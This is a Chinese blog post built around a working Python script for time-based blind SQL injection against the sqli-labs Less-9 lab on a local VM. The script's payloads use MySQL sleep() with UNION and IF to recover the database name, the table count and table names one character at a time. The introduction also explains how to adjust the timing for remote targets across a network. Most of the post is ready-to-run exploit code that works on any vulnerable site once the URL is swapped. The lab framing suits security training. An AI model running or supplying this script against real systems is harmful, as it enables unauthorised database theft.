sqli-labs Time-based 盲注脚本

    sqli-labs lab9/lab10是基于时间的盲注,如果完全用手动注入,费时费力。想到之前写过一篇基于布尔盲注的博文,于是我把当时脚本中的payload进行了修改,记录于此。

    相比之前的脚本,替换了payload。另外,脚本记录了发送请求前的时间和响应返回的时间,比较时间差是否大于payload中设置的sleep时间(因为测试用的服务器就在本地虚拟机里,几乎不会有延迟,所以可以这么简单地比较时间差;如果目标在网络另一端,应先用不带 sleep 的请求测出基准往返时间,再以"基准 + sleep 时间"作为阈值,否则网络抖动会造成误判。另外,每个请求都应设置超时,避免目标挂起时脚本永远阻塞)。

import requests
import time

# Upper bounds for the brute-force loops below.  Each probe loop gives up
# once its counter reaches the bound, so raise these if the target has
# longer names, or more tables/columns/rows, than expected.
MAX_DBName_len = 100
MAX_TableName_len = 100
MAX_ColumnName_len = 100
MAX_Data_len = 100
MAX_Table_Num = 100
MAX_Column_Num = 100
MAX_Data_Num = 100

# Candidate alphabet, tried in this order for every character position:
# digits, ASCII letters, then a few punctuation characters.  A name that
# contains anything outside this set cannot be recovered by the
# per-character loops (they abort with "Letters too little!").
chars = (
    "0123456789"
    "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    "abcdefghijklmnopqrstuvwxyz"
    "{}_!@#$%^&*()"
)

# Injection point.  Every payload below is concatenated straight after this
# string, so the trailing `id=1` is the parameter being exploited; the host
# is a local lab VM, which is why the timing checks need no baseline.
target_url = "http://192.168.119.135/sqli-labs/Less-9/?id=1"


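def get_DBName_len():
    """Recover the length of the current database name via a time-based oracle.

    For each candidate length ``i`` the payload asks MySQL to ``sleep(3)``
    only when ``length(database()) = i``; a response that takes longer than
    the sleep is treated as a hit.

    Returns:
        The recovered length (always >= 1).

    Raises:
        SystemExit: if no candidate below ``MAX_DBName_len`` triggered the
            delay -- nothing further can be enumerated without the length.
        requests.RequestException: if the target does not answer within the
            per-request timeout.  A stalled target must abort the run rather
            than be silently counted as a "true" branch.
    """
    print("Start to get DBName_len...")
    # Seconds requested from sleep() in the payload; the timing threshold
    # below must stay in step with the literal inside the SQL.
    delay = 3
    url_template = target_url + "' union select 1,2,if (length(database())={0},sleep(3),null) %2D%2D%20"

    # NOTE(review): comparing the raw round-trip against `delay` is only
    # sound when latency is negligible (the local lab VM this was written
    # for).  Against a remote target, measure a baseline with a
    # non-sleeping payload first and compare against baseline + delay,
    # otherwise network jitter produces false positives.
    # length(database()) is never 0, so probing starts at 1.
    for i in range(1, MAX_DBName_len):
        url = url_template.format(i)
        started = time.monotonic()  # immune to wall-clock adjustments
        # Timeout comfortably above `delay` so a genuine true branch is not
        # cut short, but bounded so a hung target cannot block forever.
        requests.get(url, timeout=delay + 10)
        if time.monotonic() - started > delay:
            DBName_len = i
            print("DBName_len is: ", DBName_len)
            break
    else:
        # Loop exhausted without a hit.
        print("DBName_len > MAX_DBName_len!")
        print("Cannot get DB_len. Program ended.")
        raise SystemExit(1)
    return DBName_len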

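def get_DBName(DBName_len):
    """Recover the current database name one character at a time.

    For every position the candidates in ``chars`` are tried in order; the
    payload sleeps only when ``ascii(substr(database(), pos, 1))`` equals
    the candidate's code point.  ``chars`` is pure ASCII, so comparing
    against ``ord(char)`` is exact.

    Args:
        DBName_len: number of characters to recover, normally the value
            returned by ``get_DBName_len()``.

    Returns:
        The recovered name; an empty string when ``DBName_len`` <= 0.

    Raises:
        SystemExit: if a position matches none of the candidates in
            ``chars`` (the name uses a character outside the alphabet).
        requests.RequestException: if a request exceeds its timeout.
    """
    print("Start to retrieve database name...")
    # Must match the sleep() literal in the payload.
    delay = 2
    url_template = target_url + "' union select 1,2, if(ascii(substr(database(),{0},1))={1},sleep(2),null) %2D%2D%20"
    found = []
    for pos in range(1, DBName_len + 1):
        for char in chars:
            url = url_template.format(pos, ord(char))
            started = time.monotonic()
            # Bounded timeout: a hung target aborts the run instead of
            # being mistaken for a delayed (true) branch.
            requests.get(url, timeout=delay + 10)
            if time.monotonic() - started > delay:
                found.append(char)
                break
        else:
            # Alphabet exhausted for this position.
            print("Letters too little! Program ended.")
            raise SystemExit(1)
    DBName = "".join(found)
    print("Retrieve completed! DBName is: " + DBName)
    return DBName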

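def get_TableNumOfDB(DBName):
    """Count the tables in the current database via a time-based oracle.

    Args:
        DBName: accepted for API symmetry but unused -- the payload queries
            ``database()`` directly rather than the supplied name.

    Returns:
        The table count, or 0 if no candidate below ``MAX_Table_Num``
        matched.  A result of 0 is therefore ambiguous (empty schema vs.
        failed enumeration); the caller has to decide.

    Raises:
        requests.RequestException: if a request exceeds its timeout.
    """
    print("Start to get TableNumOfDB...")
    # Must match the sleep() literal in the payload.
    delay = 2
    url_template = target_url + "' and if ((select count(table_name)a from information_schema.tables where table_schema = database() having a={0}),sleep(2),true)  %2D%2D%20"
    TableNumOfDB = 0
    for i in range(0, MAX_Table_Num):
        url = url_template.format(i)
        started = time.monotonic()
        requests.get(url, timeout=delay + 10)
        if time.monotonic() - started > delay:
            TableNumOfDB = i
            print("the number of table is:", TableNumOfDB)
            break
    else:
        # The original compared `i` against TableNumOfDB - 1 (always -1 at
        # this point), so this warning could never fire; for/else reports
        # exhaustion reliably.
        print("table number of database > MAX_Table_Num!")
    return TableNumOfDB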

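def get_TableName_len(Table_num):
    """Recover the length of the ``Table_num``-th table name in the schema.

    Args:
        Table_num: 1-based index into the tables of the current schema in
            ``information_schema`` order; mapped to ``limit Table_num-1,1``.

    Returns:
        The recovered length, or 0 when no candidate below
        ``MAX_TableName_len`` matched.  ``Table_num < 1`` also yields 0
        without sending anything: ``limit -1,1`` is a MySQL syntax error
        and would never sleep, so probing it is a hundred wasted requests.

    Raises:
        requests.RequestException: if a request exceeds its timeout.
    """
    print("Start to get TableName_len...")
    if Table_num < 1:
        print("Table_num must be >= 1 (got %r); nothing to probe." % (Table_num,))
        return 0
    # Must match the sleep() literal in the payload.
    delay = 2
    url_template = target_url + "' and if (( (select length(table_name) from information_schema.tables where table_schema = database() limit {0},1)={1}),sleep(2),true)   %2D%2D%20"
    TableName_len = 0
    for i in range(0, MAX_TableName_len):
        url = url_template.format(Table_num - 1, i)
        started = time.monotonic()
        requests.get(url, timeout=delay + 10)
        if time.monotonic() - started > delay:
            TableName_len = i
            break
    else:
        print("TableName_len > MAX_TableName_len!")
    return TableName_len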

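def get_TableName(Table_num, TableName_len):
    """Recover the ``Table_num``-th table name one character at a time.

    Args:
        Table_num: 1-based index into the tables of the current schema,
            mapped to ``limit Table_num-1,1`` in the payload.
        TableName_len: number of characters to recover, normally the value
            returned by ``get_TableName_len(Table_num)``.

    Returns:
        The recovered name; an empty string when ``TableName_len`` <= 0.

    Raises:
        SystemExit: if a position matches none of the candidates in
            ``chars``.
        requests.RequestException: if a request exceeds its timeout.
    """
    print("Start to get TableName...")
    # Must match the sleep() literal in the payload.
    delay = 2
    url_template = target_url + "' and if ((ascii(substr((select table_name from information_schema.tables where table_schema = database() limit {0},1),{1},1))={2}),sleep(2),true)  %2D%2D%20"
    found = []
    for pos in range(1, TableName_len + 1):
        for char in chars:
            url = url_template.format(Table_num - 1, pos, ord(char))
            started = time.monotonic()
            # Bounded timeout: a hung target aborts the run instead of
            # being mistaken for a delayed (true) branch.
            requests.get(url, timeout=delay + 10)
            if time.monotonic() - started > delay:
                found.append(char)
                break
        else:
            # Alphabet exhausted for this position.
            print("Letters too little! Program ended.")
            raise SystemExit(1)
    TableName = "".join(found)
    print("Retrieve completed! TableName is: " + TableName)
    return TableName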

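if __name__ == "__main__":
    # Table indices are 1-based (see get_TableName_len).  The original loop
    # started at 0, which became `limit -1,1` -- invalid SQL that never
    # slept and silently produced an empty name after a full probe round.
    # TODO(review): the table count is hard-coded; get_TableNumOfDB() could
    # supply it, but its 0 result is ambiguous, so left as-is for now.
    for table_index in range(1, 4 + 1):
        TableName_len = get_TableName_len(table_index)
        TabName = get_TableName(table_index, TableName_len)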
